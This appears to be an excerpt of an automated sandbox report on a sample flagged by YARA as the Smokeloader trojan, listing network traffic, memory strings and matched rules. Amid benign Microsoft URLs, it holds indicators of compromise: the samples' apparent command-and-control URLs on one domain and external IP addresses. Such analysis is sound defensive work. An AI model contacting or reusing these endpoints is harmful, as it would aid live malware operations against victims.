      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:48:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 e8 d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW|
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:49:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:49:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:49:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:50:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:50:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:50:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:50:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:50:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:50:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:50:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:50:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:50:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:51:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 06 Aug 2024 12:52:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1750648090.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1750648090.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1750648090.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1750648090.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1749984821.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1751253415.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1750347122.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000001.00000000.1758007071.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1748703130.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1748144238.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1750648090.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1750648090.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: 70C1.exe, 00000006.00000002.2415753846.000001CD0D25D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mundoparachicas.space/
      Source: AA31.exe, 00000007.00000002.2486672501.00000253616AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mundoparachicas.space/Lp_
      Source: 70C1.exe, 00000006.00000002.2416403433.000001CD0D46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mundoparachicas.space/dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO
      Source: AA31.exe, 00000007.00000002.2487346926.000002536186A000.00000004.00001000.00020000.00000000.sdmp, AA31.exe, 00000007.00000003.2475368432.00000253616C0000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2486877032.00000253616DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LO
      Source: explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1758007071.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1758007071.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownHTTPS traffic detected: 45.130.41.250:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49758 version: TLS 1.2

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
